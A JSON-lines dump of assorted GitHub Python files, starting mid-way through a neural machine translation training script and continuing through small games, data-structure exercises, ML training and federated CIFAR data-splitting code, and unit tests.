token_level_lang=opt.language_classifier_tok,\n bidirectional=opt.bidirectional_translation,\n multidataset=True,\n en_id=opt.en_id)\n\n train_sets.append(train_data)\n\n else:\n print(\"Multi-dataset not implemented for Streaming tasks.\")\n raise NotImplementedError\n\n for (idx_, dir_) in sorted(valid_dirs.items()):\n\n data_dir = os.path.join(root_dir, dir_)\n\n print(\"[INFO] Loading validation data %i from %s\" % (idx_, dir_))\n\n if opt.data_format in ['bin', 'raw']:\n raise NotImplementedError\n\n elif opt.data_format in ['scp', 'scpmem', 'mmem']:\n\n if opt.data_format in ['scp', 'scpmem']:\n audio_data = torch.load(os.path.join(data_dir, \"data.scp_path.pt\"))\n src_data = SCPIndexDataset(audio_data, concat=opt.concat)\n else:\n src_data = MMapIndexedDataset(os.path.join(data_dir, \"data.src\"))\n\n tgt_data = MMapIndexedDataset(os.path.join(data_dir, \"data.tgt\"))\n\n src_lang_data = MMapIndexedDataset(os.path.join(data_dir, 'data.src_lang'))\n tgt_lang_data = MMapIndexedDataset(os.path.join(data_dir, 'data.tgt_lang'))\n\n if os.path.exists(os.path.join(data_dir, 'data.src_sizes.npy')):\n src_sizes = np.load(os.path.join(data_dir, 'data.src_sizes.npy'))\n tgt_sizes = np.load(os.path.join(data_dir, 'data.tgt_sizes.npy'))\n else:\n src_sizes, sizes = None, None\n\n if opt.encoder_type == 'audio':\n data_type = 'audio'\n else:\n data_type = 'text'\n\n if not opt.streaming:\n valid_data = onmt.Dataset(src_data, tgt_data,\n src_sizes, tgt_sizes,\n src_lang_data, tgt_lang_data,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=True,\n batch_size_sents=opt.batch_size_sents,\n src_align_right=opt.src_align_right,\n cleaning=True, verbose=True, debug=True,\n num_split=len(opt.gpus),\n token_level_lang=opt.language_classifier_tok,\n bidirectional=opt.bidirectional_translation,\n multidataset=True,\n en_id=opt.en_id)\n\n valid_sets.append(valid_data)\n\n else:\n raise NotImplementedError\n\n train_data = train_sets\n valid_data = valid_sets\n\n if opt.load_from:\n checkpoint = torch.load(opt.load_from, map_location=lambda storage, loc: storage)\n print(\"* Loading dictionaries from the checkpoint\")\n dicts = checkpoint['dicts']\n print(\"(train.py) dict.keys() of checkpoint/saved model: \", dicts.keys())\n\n if opt.load_vocab_from_data is not None: # only useful when vocab is expanded\n vocab_data = torch.load(opt.load_vocab_from_data, map_location=lambda storage, loc: storage)\n print(vocab_data.keys())\n # TODO: OVERWRITE src and tgt?\n dicts['src'] = vocab_data['src']\n dicts['tgt'] = vocab_data['tgt']\n # for tok in vocab_data['dicts']['src'].labelToIdx: # toks in new language\n # dicts['src'].add(tok)\n # for tok in vocab_data['dicts']['tgt'].labelToIdx: # toks new language\n # dicts['tgt'].add(tok)\n\n # TODO: doesn't really hurt supervised directions when re-initializing this?\n # if len(vocab_data['dicts']['langs']) > dicts['langs']:\n for lan in vocab_data['langs']: # new language\n if lan not in dicts['langs']:\n dicts['langs'][lan] = len(dicts['langs'])\n print(' *** added language dict {0} to {1}'.format(lan, dicts['langs']))\n # else::q\n # dicts['langs'] = vocab_data['dicts']['langs']\n\n # print(dicts['langs']['cs'])\n # print(vocab_data['gen'])\n # if 'gen' not in dicts:\n # dicts['gen'] = list()\n # for lan in vocab_data['gen']:\n # print(lan)\n # if lan not in dicts['gen']:\n # dicts['gen'][lan] = len(dicts['gen'])\n # print(' *** added gender dict {0} to {1}'.format(gen, dicts['gen']))\n\n else:\n dicts['tgt'].patch(opt.patch_vocab_multiplier)\n checkpoint = None\n\n if \"src\" in dicts:\n print(' * vocabulary size. source = %d; target = %d' %\n (dicts['src'].size(), dicts['tgt'].size()))\n else:\n print(' * vocabulary size. target = %d' %\n (dicts['tgt'].size()))\n\n print('* Building model...')\n\n if not opt.fusion:\n model = build_model(opt, dicts)\n\n \"\"\" Building the loss function \"\"\"\n\n if opt.ctc_loss > 0.0:\n from onmt.speech.ctc_loss import CTC\n loss_function = CTC(dicts['tgt'].size(), opt.model_size, 0.0, reduce=True)\n # if opt.ctc_loss != 0:\n # loss_function = NMTAndCTCLossFunc(dicts['tgt'].size(),\n # label_smoothing=opt.label_smoothing,\n # ctc_weight=opt.ctc_loss)\n else:\n loss_function = NMTLossFunc(opt.model_size, dicts['tgt'].size(),\n label_smoothing=opt.label_smoothing,\n mirror=opt.mirror_loss)\n\n # This function replaces modules with the more optimized counterparts so that it can run faster\n # Currently exp with LayerNorm\n optimize_model(model)\n\n else:\n from onmt.model_factory import build_fusion\n from onmt.modules.loss import FusionLoss\n\n model = build_fusion(opt, dicts)\n\n loss_function = FusionLoss(dicts['tgt'].size(), label_smoothing=opt.label_smoothing)\n\n if opt.sim_loss_type:\n sim_loss_input_type = opt.sim_loss_type % 10\n sim_loss_func_type = opt.sim_loss_type // 10\n aux_loss_weight = opt.aux_loss_weight\n\n if sim_loss_func_type == 1:\n aux_loss_function = MSEEncoderLoss(input_type=sim_loss_input_type, weight=aux_loss_weight)\n elif sim_loss_func_type == 2:\n aux_loss_function = CosineEncoderLoss(input_type=sim_loss_input_type, weight=aux_loss_weight)\n else:\n raise NotImplementedError\n\n else:\n aux_loss_function = None\n\n n_params = sum([p.nelement() for p in model.parameters()])\n print('* number of parameters: %d' % n_params)\n\n if len(opt.gpus) > 1 or opt.virtual_gpu > 1:\n raise NotImplementedError(\"Multi-GPU training is not supported at the moment.\")\n else:\n if not opt.adversarial_classifier:\n trainer = XETrainer(model, loss_function, train_data, valid_data, dicts, opt, True, aux_loss_function)\n else:\n trainer = XEAdversarialTrainer(model, loss_function, train_data, valid_data, dicts, opt)\n\n trainer.run(checkpoint=checkpoint)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"lenacabrera/gb_mnmt","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":27579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7891790776","text":"import random\n\n\ndef get_currency_rate():\n return 3.5\n\n\ndef get_money_interval(difficulty, random_number):\n current_rate = get_currency_rate()\n lower_bound = random_number - (5 - difficulty)\n upper_bound = random_number + (5 - difficulty)\n return lower_bound * current_rate, upper_bound * current_rate\n\n\ndef get_guess_from_user():\n return float(input(\"Enter your guess for the value in ILS: \"))\n\n\ndef compare(lower_bound, upper_bound, user_guess):\n if lower_bound <= user_guess <= upper_bound:\n return True\n else:\n return False\n\n\ndef play(Difficulty):\n random_number = random.randint(1, 100)\n num_of_guesses = 0\n while num_of_guesses < 3:\n\n lower_bound, upper_bound = get_money_interval(\n Difficulty, random_number)\n print(f\"Guess the value of {random_number} USD in ILS.\")\n user_guess = get_guess_from_user()\n result = compare(lower_bound, upper_bound, user_guess)\n if result:\n return result\n print('no...\\n')\n num_of_guesses += 1\n\n return result\n","repo_name":"vitalydono/world-of-games","sub_path":"CurrencyRouletteGame.py","file_name":"CurrencyRouletteGame.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29191955988","text":"class Node:\n def __init__(self, data, priority):\n self.data = data\n self.priority = priority\n self.next = None\n\n\nclass Queue:\n def __init__(self):\n self.front = None\n\n def enqueue(self, value, priority):\n new_node = Node(value, priority)\n if self.front is None:\n self.front = new_node\n return\n if self.front.priority < priority:\n new_node.next = self.front\n self.front = new_node\n temp = self.front\n while temp.next is not None and temp.next.priority > priority:\n temp = temp.next\n if temp.next is None:\n temp.next = new_node\n else:\n new_node.next = temp.next\n temp.next = new_node\n\n\n\n\nq = Queue()\nq.enqueue(1)\nq.enqueue(2)\nq.enqueue(3)\nprint(q)\nprint(q.dequeue())\nprint(q)","repo_name":"cspandit/Python-DS-and-Algo","sub_path":"queue/implementation/queue_using_circular_linked_list.py","file_name":"queue_using_circular_linked_list.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74485296087","text":"import time\nimport math\nimport os\nimport numpy as np\nimport h5py\nfrom PIL import Image\n\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\n\nfrom privacy.Model_Inversion_Attack.net_norm import *\nfrom privacy.Model_Inversion_Attack.utils_norm import *\n# from preprocess_test import *\n\ndef train(DATASET = 'CIFAR10', network = 'MIASCNN', NEpochs = 200, imageWidth = 32,\n imageHeight = 32, imageSize = 32*32, NChannels = 3, NClasses = 10,\n BatchSize = 32, learningRate = 1e-3, NDecreaseLR = 20, eps = 1e-3,\n AMSGrad = True, model_dir = \"checkpoints/CIFAR10/\", model_name = \"ckpt.pth\", gpu = True):\n\n print(\"DATASET: \", DATASET)\n\n\n###load data\n\n if DATASET == 'Medical': \n \n h5f = h5py.File('/home/cougarnet.uh.edu/pyuan2/Projects/Incidental_Lung/privacy/Model_Inversion_Attack/lung_train76.h5', 'r')\n X_train = h5f['x'][:]\n Y_train = h5f['y'][:]\n h5f.close()\n\n h5f = h5py.File('/home/cougarnet.uh.edu/pyuan2/Projects/Incidental_Lung/privacy/Model_Inversion_Attack/lung_test26.h5', 'r')\n X_test = h5f['x'][:]\n Y_test = h5f['y'][:]\n h5f.close()\n \n\n print(Y_train)\n print(Y_test)\n X_train = preprocess(X_train)\n X_test = preprocess(X_test)\n\n###load network\n\n netDict = {\n 'CIFAR10CNN': CIFAR10CNN,\n }\n\n if network in netDict: \n net = netDict[network](NChannels)\n else:\n print(\"Network not found\")\n exit(1)\n\n print(net)\n print(\"len(trainset) \", len(X_train))\n print(\"len(testset) \", len(X_test))\n\n### pararmeters\n criterion = nn.CrossEntropyLoss()\n softmax = nn.Softmax(dim=1)\n\n if gpu: # GPU\n net.cuda()\n criterion.cuda()\n softmax.cuda()\n\n optimizer = optim.Adam(params = net.parameters(), lr = learningRate, eps = eps, amsgrad = AMSGrad) # Adam optimizer\n # optimizer = torch.optim.SGD(net.parameters(), lr=learningRate) # SGD optimizer\n NBatch = int(len(X_train) / BatchSize)\n cudnn.benchmark = True\n\n###training\n \n for epoch in range(NEpochs):\n lossTrain = 0.0\n accTrain = 0.0\n \n # if epoch >100:\n # optimizer = optim.Adam(params = net.parameters(), lr = learningRate/2, eps = eps, amsgrad = AMSGrad)\n \n for i in range(NBatch):\n \n ### batch data (shuffle)\n index = np.random.randint(0, len(X_train), BatchSize)\n batchX = X_train[index]\n batchX = torch.from_numpy(batchX)\n batchX = batchX.view(-1,1,64,64).type(torch.FloatTensor) \n \n batchY = Y_train[index]\n \n batchY = torch.Tensor([batchY]).long().view(BatchSize)\n \n \n if gpu:\n batchX = batchX.cuda()\n batchY = batchY.cuda()\n \n ### calculate the loss and gradients \n optimizer.zero_grad()\n logits = net.forward(batchX)\n prob = softmax(logits)\n\n # print prob\n loss = criterion(logits, batchY) # + l2loss(logits) # softmax \n # loss = F.nll_loss(F.log_softmax(logits, dim=1), batchY) #+ 0.001 * l2loss(logits) # logsoftmax\n loss.backward()\n\n ### add noise \n # clip_grad(net.parameters(), grad_norm_bound=5)\n # add_noise(net.parameters(), grad_norm_bound=5, scale=10)\n \n optimizer.step()\n \n lossTrain += loss.cpu().detach().numpy() / NBatch\n\n if gpu:\n pred = np.argmax(prob.cpu().detach().numpy(), axis = 1)\n groundTruth = batchY.cpu().detach().numpy()\n\n else:\n pred = np.argmax(prob.detach().numpy(), axis = 1)\n groundTruth = batchY.detach().numpy()\n \n \n \n acc = np.mean(pred == groundTruth) # accuracy per Batch\n accTrain += acc / NBatch # accuracy per iteration\n \n \n\n\n if (epoch + 1) % NDecreaseLR == 0:\n learningRate = learningRate / 2.0\n setLearningRate(optimizer, learningRate)\n\n print(\"Epoch: \", epoch, \"Loss: \", lossTrain, \"Train accuracy: \", accTrain)\n\n### Testing\n\n accTest = evalTest(X_test, Y_test, net, gpu = gpu)\n \n### save trained network\n\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n torch.save(net, model_dir + model_name)\n print(\"Model saved\")\n\n### load trained network\n\n newNet = torch.load(model_dir + model_name)\n newNet.eval()\n accTest = evalTest(X_test, Y_test, net, gpu = gpu)\n print(\"Model restore done\")\n\n\nif __name__ == '__main__':\n import argparse\n import sys\n import traceback\n\n try:\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', type = str, default = 'Medical')\n parser.add_argument('--network', type = str, default = 'CIFAR10CNN')\n parser.add_argument('--epochs', type = int, default = 50)\n parser.add_argument('--eps', type = float, default = 1e-8) #-3\n parser.add_argument('--AMSGrad', type = bool, default = True)\n parser.add_argument('--batch_size', type = int, default = 1)\n parser.add_argument('--learning_rate', type = float, default = 1e-3)\n parser.add_argument('--decrease_LR', type = int, default = 20) #20\n\n parser.add_argument('--nogpu', dest='gpu', action='store_false')\n parser.set_defaults(gpu=True)\n args = parser.parse_args()\n\n model_dir = \"models/\" + args.dataset + '/'\n model_name = \"CNN_original.pth\"\n\n if args.dataset == 'Medical':\n\n imageWidth = 64\n imageHeight = 64\n imageSize = imageWidth * imageHeight\n NChannels = 1\n NClasses = 2\n network = 'CIFAR10CNN'\n\n\n else:\n print(\"No Dataset Found\")\n exit(0)\n\n \n train(DATASET = args.dataset, network = network, NEpochs = args.epochs, imageWidth = imageWidth,\n imageHeight = imageHeight, imageSize = imageSize, NChannels = NChannels, NClasses = NClasses,\n BatchSize = args.batch_size, learningRate = args.learning_rate, NDecreaseLR = args.decrease_LR, eps = args.eps,\n AMSGrad = args.AMSGrad, model_dir = model_dir, model_name = model_name, gpu = args.gpu)\n\n except:\n traceback.print_exc(file=sys.stdout)\n sys.exit(1)\n","repo_name":"ypy516478793/Incidental_lung","sub_path":"privacy/Model_Inversion_Attack/training_norm.py","file_name":"training_norm.py","file_ext":"py","file_size_in_byte":6723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12057387584","text":"#coding=utf-8\n'''\nimport subprocess\nimport datetime\nprint(datetime.datetime.now())\np = subprocess.Popen(\"ping localhost > nul\",shell=True)\nprint(\"程序执行中...\")\np.wait()\nprint(datetime.datetime.now())\n'''\n'''\nfrom tkinter import *\nwin=Tk();\nwin.geometry(\"800x600\")\nwin.minsize(400,300)\nwin.maxsize(1440,900)\nwin.mainloop()\n'''\n'''\nimport subprocess\ntrtcode = subprocess.call([\"notepad.exe\",\"test.txt\"])\nprint(trtcode)\n'''\n'''\nimport requests\nres = requests.get('https://www.baidu.com')\nres.encoding = 'utf-8'\nf=open('send.html','w')\nf.write(res.text)\nf.close()\n#print(res.text)\n'''\n'''\nimport win32process\nhandle = win32process.CreateProcess('C:\\Windows\\\\notepad.exe','',None,None,0,win32process.CREATE_NO_WINDOW,None,None,win32process.STARTUPINFO())\n'''\n\n'''\n#进程池\nfrom multiprocessing import Pool\nfrom time import sleep\nimport subprocess\n\ndef f(x):\n retcode = subprocess.call(\"notepad.exe\")\n sleep(1)\ndef main():\n pool = Pool(processes=10)\n for i in range(1,10):\n result = pool.apply_async(f,(i,))\n pool.close()\n pool.join()\n if result.successful():\n print('successful!')\nif __name__ == \"__main__\":\n main();\n'''\n'''\nimport threading\n\ndef f(i):\n print(\"I am from a thread, num = %d \\n\"%(i))\n\ndef main():\n for i in range(1,10240):\n t = threading.Thread(target=f,args=(i,))\n t.setDaemon(True)\n t.start()\n #t.join()\n \nif __name__ == \"__main__\":\n main()\n'''\n'''\nimport threading\nimport time\nnum = 0\nlock = threading.Lock()\ndef f():\n global num\n if lock.acquire():\n print(\"%s 获得指令锁\\n\" %threading.currentThread().getName())\n b = num\n time.sleep(0.001)\n num=b+1\n lock.release()\n print(\"%s 释放指令锁\\n\" %threading.currentThread().getName())\n print(\"%s \\n\" %threading.currentThread().getName())\n\ndef main():\n for i in range(1,20):\n t = threading.Thread(target=f)\n t.setDaemon(True)\n t.start()\n t.join()\n print(num)\n\nif __name__ == \"__main__\":\n main()\n'''\nif __name__ == \"__main__\":\n import socket\n sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n \n sock.bind(('localhost',8001))\n sock.listen(5)\n while True:\n connection,address = sock.accept()\n try:\n connection.settimeout(5)\n buf = connection.recv(1024).decode('utf-8')\n if buf == '1':\n connection.send(b'welcome to server!')\n else:\n connection.send(b'please go out!')\n except socket.timeout:\n print('time out!')\n connection.close()","repo_name":"ZZbitmap/Python","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10742225156","text":"import a2\nimport unittest\n\nclass TestRatEatSprout(unittest.TestCase):\n \"\"\" Test class for Rat.eat_sprout method of a2 module. \"\"\"\n\n def test_rat_eat_sprout_1(self):\n \"\"\"\n Test if rat.num_sprout_eaten increses.\n \"\"\"\n rat_name = a2.RAT_1_CHAR\n rat_row = 1\n rat_col = 4\n rat = a2.Rat(rat_name, rat_row, rat_col)\n rat.eat_sprout()\n\n self.assertEqual(rat.num_sprouts_eaten, 1)\n\n\n def test_rat_eat_sprout_2(self):\n \"\"\"\n Test if rat.num_sprout_eaten maps to correct value.\n \"\"\"\n rat_name = a2.RAT_1_CHAR\n rat_row = 1\n rat_col = 4\n rat = a2.Rat(rat_name, rat_row, rat_col)\n\n for i in range(10):\n rat.eat_sprout()\n\n self.assertEqual(rat.num_sprouts_eaten, 10)\n\n\nif __name__ == \"__main__\":\n unittest.main(exit=False)\n","repo_name":"gacrta/Learn_to_Program","sub_path":"RatMaze/test_rat_eat_sprout.py","file_name":"test_rat_eat_sprout.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72777154009","text":"#Faça um programa que leia o código dos itens pedidos e as quantidades desejadas. Calcule e mostre o valor a ser pago por item (preço * quantidade) e o total geral do \n# pedido. Considere que o cliente deve informar quando o pedido deve ser encerrado.\n\nlanche = ['Cachorro Quente', 'Bauru Simples', 'Bauru com ovo', 'Hambúguer', 'Cheeseburguer', 'Refrigerante']\npreco = [1.20, 1.30, 1.50, 1.20, 1.30, 1.00]\ncod = [100, 101, 102, 103, 104, 105]\npedido = []\ncont = 0\nresp = True\n\nwhile resp != 'NAO' and resp != 'nao' and resp != 'n':\n print('Especificação | Código | Preço')\n print('Cachorro Quente | 100 | R$ 1,20 \\nBauru Simples | 101 | R$ 1,30 \\nBauru com ovo | 102 | R$ 1,50 \\nHambúrguer | 103 | R$ 1,20 \\nCheeseburguer | 104 | R$ 1,30 \\nRefrigerante | 105 | R$ 1,00')\n\n codigo = int(input(\"Digite o código do pedido que você deseja: \"))\n\n z = cod.index(codigo)\n\n qtde = int(input(\"Digite a quantos desse lanche você quer: \"))\n\n valor = preco[z]*qtde\n\n pedido.append(valor)\n\n resp = input(\"Deseja fazer um novo pedido?: \")\n\nwhile cont>> print(pi())\r\n 3.141592653589793238462643383\r\n\r\n \"\"\"\r\n decimal.getcontext().prec += 2 # extra digits for intermediate steps\r\n three = decimal.Decimal(3) # substitute \"three=3.0\" for regular floats\r\n lasts, t, s, n, na, d, da = 0, three, 3, 1, 0, 0, 24\r\n while s != lasts:\r\n lasts = s\r\n n, na = n + na, na + 8\r\n d, da = d + da, da + 32\r\n t = (t * n) / d\r\n s += t\r\n decimal.getcontext().prec -= 2\r\n return +s # unary plus applies the new precision\r\n\r\ndef exp(x):\r\n \"\"\"Return e raised to the power of x. Result type matches input type.\r\n\r\n >>> print(exp(Decimal(1)))\r\n 2.718281828459045235360287471\r\n >>> print(exp(Decimal(2)))\r\n 7.389056098930650227230427461\r\n >>> print(exp(2.0))\r\n 7.38905609893\r\n >>> print(exp(2+0j))\r\n (7.38905609893+0j)\r\n\r\n \"\"\"\r\n decimal.getcontext().prec += 2\r\n i, lasts, s, fact, num = 0, 0, 1, 1, 1\r\n while s != lasts:\r\n lasts = s\r\n i += 1\r\n fact *= i\r\n num *= x\r\n s += num / fact\r\n decimal.getcontext().prec -= 2\r\n return +s # unary plus applies the new precision\r\n\r\ndef cos(x):\r\n \"\"\"Return the cosine of x as measured in radians.\r\n\r\n The Taylor series approximation works best for a small value of x.\r\n For larger values, first compute x = x % (2 * pi).\r\n\r\n >>> print(cos(Decimal('0.5')))\r\n 0.8775825618903727161162815826\r\n >>> print(cos(0.5))\r\n 0.87758256189\r\n >>> print(cos(0.5+0j))\r\n (0.87758256189+0j)\r\n\r\n \"\"\"\r\n decimal.getcontext().prec += 2\r\n i, lasts, s, fact, num, sign = 0, 0, 1, 1, 1, 1\r\n while s != lasts:\r\n lasts = s\r\n i += 2\r\n fact *= i * (i - 1)\r\n num *= x * x\r\n sign *= -1\r\n s += num / fact * sign\r\n decimal.getcontext().prec -= 2\r\n return +s # unary plus applies the new precision\r\n\r\ndef sin(x):\r\n \"\"\"Return the sine of x as measured in radians.\r\n\r\n The Taylor series approximation works best for a small value of x.\r\n For larger values, first compute x = x % (2 * pi).\r\n\r\n >>> print(sin(Decimal('0.5')))\r\n 0.4794255386042030002732879352\r\n >>> print(sin(0.5))\r\n 0.479425538604\r\n >>> print(sin(0.5+0j))\r\n (0.479425538604+0j)\r\n\r\n \"\"\"\r\n decimal.getcontext().prec += 2\r\n i, lasts, s, fact, num, sign = 1, 0, x, 1, x, 1\r\n while s != lasts:\r\n lasts = s\r\n i += 2\r\n fact *= i * (i - 1)\r\n num *= x * x\r\n sign *= -1\r\n s += num / fact * sign\r\n decimal.getcontext().prec -= 2\r\n return +s # unary plus applies the new precision\r\n\r\ndef atan2(x):\r\n pass\r\n\r\ndef acos(x):\r\n return 2.*atan2((decimal.Decimal(1. - x)).sqrt(), (decimal.Decimal(1. + x)).sqrt())\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n Pi = pi()\r\n print(sin(Pi / 2))\r\n print(sin(Pi / 6))\r\n print(math.asin(decimal.Decimal(1)) * 2)\r\n print(cos(Pi / 6))\r\n print(decimal.Decimal(3).sqrt() / 2)\r\n\r\n import fractions\r\n ratpi = fractions.Fraction(Pi).limit_denominator(1000)\r\n print(ratpi)\r\n Ratnum = decimal.Decimal(ratpi.numerator)\r\n Ratden = decimal.Decimal(ratpi.denominator)\r\n Ratpi = Ratnum / Ratden\r\n print(Ratpi)\r\n print(Pi)\r\n","repo_name":"brassogre/ProjectLine","sub_path":"Geo/ArbitraryPrecisionFuncs.py","file_name":"ArbitraryPrecisionFuncs.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12108812400","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nimport os\n\nimport envoy\nimport git\nfrom nose.tools import assert_raises\n\nimport batch\nimport identifier\n\nTMP_DIR = '/tmp/tests-ddr-batch'\n\n\n# Exporter\n# TODO test_make_tmpdir\n# TODO test_export\n\n# Checker\n# TODO check_repository\n# TODO check_csv\n# TODO check_eids\n\ndef test_guess_model():\n # no rows\n rowds0 = []\n expected0 = []\n #out0 = batch.Checker._guess_model(rowds0)\n #assert out0 == expected0\n assert_raises(Exception, batch.Checker._guess_model, rowds0)\n # no identifiers\n rowds1 = [\n {'id':'ddr-testing-123-1'},\n {'id':'ddr-testing-123-1'},\n ]\n expected1 = []\n assert_raises(Exception, batch.Checker._guess_model, rowds1)\n # too many models\n rowds2 = [\n {\n 'id':'ddr-testing-123-1',\n 'identifier': identifier.Identifier('ddr-testing-123-1'),\n },\n {\n 'id':'ddr-testing-123-2-master',\n 'identifier': identifier.Identifier('ddr-testing-123-2-master'),\n },\n ]\n assert_raises(Exception, batch.Checker._guess_model, rowds2)\n # entities\n rowds3 = [\n {\n 'id':'ddr-testing-123-1',\n 'identifier': identifier.Identifier('ddr-testing-123-1'),\n },\n ]\n expected3 = 'entity'\n out3 = batch.Checker._guess_model(rowds3)\n assert out3 == expected3\n # files\n rowds4 = [\n {\n 'id':'ddr-testing-123-2-master-a1b2c3',\n 'identifier': identifier.Identifier('ddr-testing-123-2-master-a1b2c3'),\n },\n ]\n expected4 = 'file'\n out4 = batch.Checker._guess_model(rowds4)\n assert out4 == expected4\n # file-roles are files\n rowds5 = [\n {\n 'id':'ddr-testing-123-2-master',\n 'identifier': identifier.Identifier('ddr-testing-123-2-master'),\n },\n ]\n expected5 = 'file'\n out5 = batch.Checker._guess_model(rowds5)\n assert out5 == expected5\n\n# TODO _ids_in_local_repo\n# TODO _load_vocab_files\n# TODO _vocab_urls\n# TODO _http_get_vocabs\n# TODO _validate_csv_file\n\ndef test_prep_valid_values():\n json_texts = [\n '{\"terms\": [{\"id\": \"advertisement\"}, {\"id\": \"album\"}, {\"id\": \"architecture\"}], \"id\": \"genre\"}',\n '{\"terms\": [{\"id\": \"eng\"}, {\"id\": \"jpn\"}, {\"id\": \"chi\"}], \"id\": \"language\"}',\n ]\n expected = {u'genre': [u'advertisement', u'album', u'architecture'], u'language': [u'eng', u'jpn', u'chi']}\n assert batch.Checker._prep_valid_values(json_texts) == expected\n\n# Importer\n# TODO _fidentifier_parent\n# TODO _file_is_new\n# TODO _write_entity_changelog\n# TODO _write_file_changelogs\n# TODO import_entities\n# TODO import_files\n# TODO register_entity_ids\n","repo_name":"gjost/ddr-cmdln-bkup","sub_path":"ddr/DDR/tests_batch.py","file_name":"tests_batch.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6012212539","text":"import torch.utils.data\nimport csv\nfrom os import path\nimport os\nimport urllib.request \nimport zipfile\nimport random\nfrom options import ARGS\nimport pickle as pickle\nfrom models import get_net_and_optimizer\nimport copy\n\ndef cifar_parser(line, is_train=True):\n if is_train:\n user_id, image_id, class_id = line\n return user_id, image_id, class_id\n else:\n image_id, class_id = line\n return image_id, class_id\n\n\ndef dirichlet_distribution(): # generate trainset split from csv\n #download csv files\n url=\"http://storage.googleapis.com/gresearch/federated-vision-datasets/cifar10_v1.1.zip\"\n if(ARGS.COLAB):\n dir=\"/content/cifar10_csv\"\n else:\n dir=os.getcwd()+\"/cifar10_csv\"\n try:\n os.mkdir(dir)\n except:\n print(\"Folder already exist\")\n \n urllib.request.urlretrieve(url, dir+\"/cifar.zip\")\n with zipfile.ZipFile(dir+\"/cifar.zip\",\"r\") as zip_ref:\n zip_ref.extractall(dir)\n \n alpha=str(\"{:.2f}\".format(ARGS.ALPHA))\n train_file=dir+\"/federated_train_alpha_\"+alpha+\".csv\"\n \"\"\"Inspects the federated train split.\"\"\"\n print('Train file: %s' % train_file)\n if not path.exists(train_file):\n print('Error: file does not exist.')\n return\n user_images={}\n for client_id in range(ARGS.NUM_CLIENTS):\n user_images[str(client_id)]=[]\n \n with open(train_file) as f:\n reader = csv.reader(f)\n next(reader) # skip header.\n for line in reader:\n user_id, image_id, class_id = cifar_parser(line, is_train=True)\n user_images[user_id].append(int(image_id))\n return user_images\n\n\ndef cifar_iid(train_set): # all clients have all classes with the same data distribution\n user_images={}\n for client_id in range(ARGS.NUM_CLIENTS):\n user_images[str(client_id)]=[]\n \n classes_dict={}\n for label in range(ARGS.NUM_CLASSES):\n classes_dict[label]=[]\n for i in range(len(train_set)):\n label=train_set[i][1]\n classes_dict[label].append(i)\n \n classes_index=[]\n for label in classes_dict.keys():\n for i in range(random.randint(2,7)):\n random.shuffle(classes_dict[label])\n classes_index=classes_index+classes_dict[label]\n\n client_id=0\n \n\n for i in classes_index:\n user_images[str(client_id)].append(i)\n client_id=client_id+1\n if(client_id==ARGS.NUM_CLIENTS):\n client_id=0\n return user_images\n\n\ndef cifar_noniid(train_set): # all clients have a number of class beetwen 1 and 7 with the same data distribution\n user_images=cifar_iid(train_set)\n for key in user_images.keys():\n n_classes=random.randint(ARGS.NUM_CLASS_RANGE[0],ARGS.NUM_CLASS_RANGE[1])\n list_of_class=random.sample(range(0, ARGS.NUM_CLASSES), n_classes)\n new_index_list=[]\n for i in user_images[key]:\n label=int(train_set[i][1])\n if(label in list_of_class):\n new_index_list.append(i)\n user_images[key]=new_index_list\n return user_images\n\n\n\ndef cifar_multimodal_noniid(train_set): \n animals_labels=[2,3,4,5,6,7]\n vehicles_labels=[0,1,8,9]\n \n num_clients_animal=max(int(ARGS.NUM_CLIENTS*ARGS.RATIO),1)\n \n user_images={}\n user_classes={}\n for client_id in range(ARGS.NUM_CLIENTS):\n user_images[str(client_id)]=[]\n if(client_id32->10 \r\n print('-----Train-----')\r\n model.train()\r\n for epoch in range(10):\r\n total_loss = 0.0\r\n for pre, post in tqdm(trainloader):\r\n\r\n post_pred = model(pre)\r\n loss = loss_fn(post_pred, post)\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n total_loss += loss\r\n avg_loss = total_loss/(2*TRAIN_SIZE/BATCH_SIZE)\r\n print(avg_loss.item())\r\n print(pre[np.random.randint(0,32)])\r\n print(post_pred[np.random.randint(0,32)])\r\n print(post[np.random.randint(0,32)])\r\n torch.save(model.state_dict(),name_model)\r\n\r\n print('-----Test-----')\r\n model.eval()\r\n total_loss = 0.0\r\n with torch.no_grad():\r\n for pre, post in tqdm(testloader):\r\n post_pred = model(pre)\r\n loss = loss_fn(post_pred, post)\r\n total_loss += loss\r\n avg_loss = total_loss/(2*TEST_SIZE/BATCH_SIZE)\r\n print(avg_loss.item()) \r\n","repo_name":"G1NO3/Geert_code","sub_path":"DL/Neurodynamics/VAE/Ponicare_mapping.py","file_name":"Ponicare_mapping.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 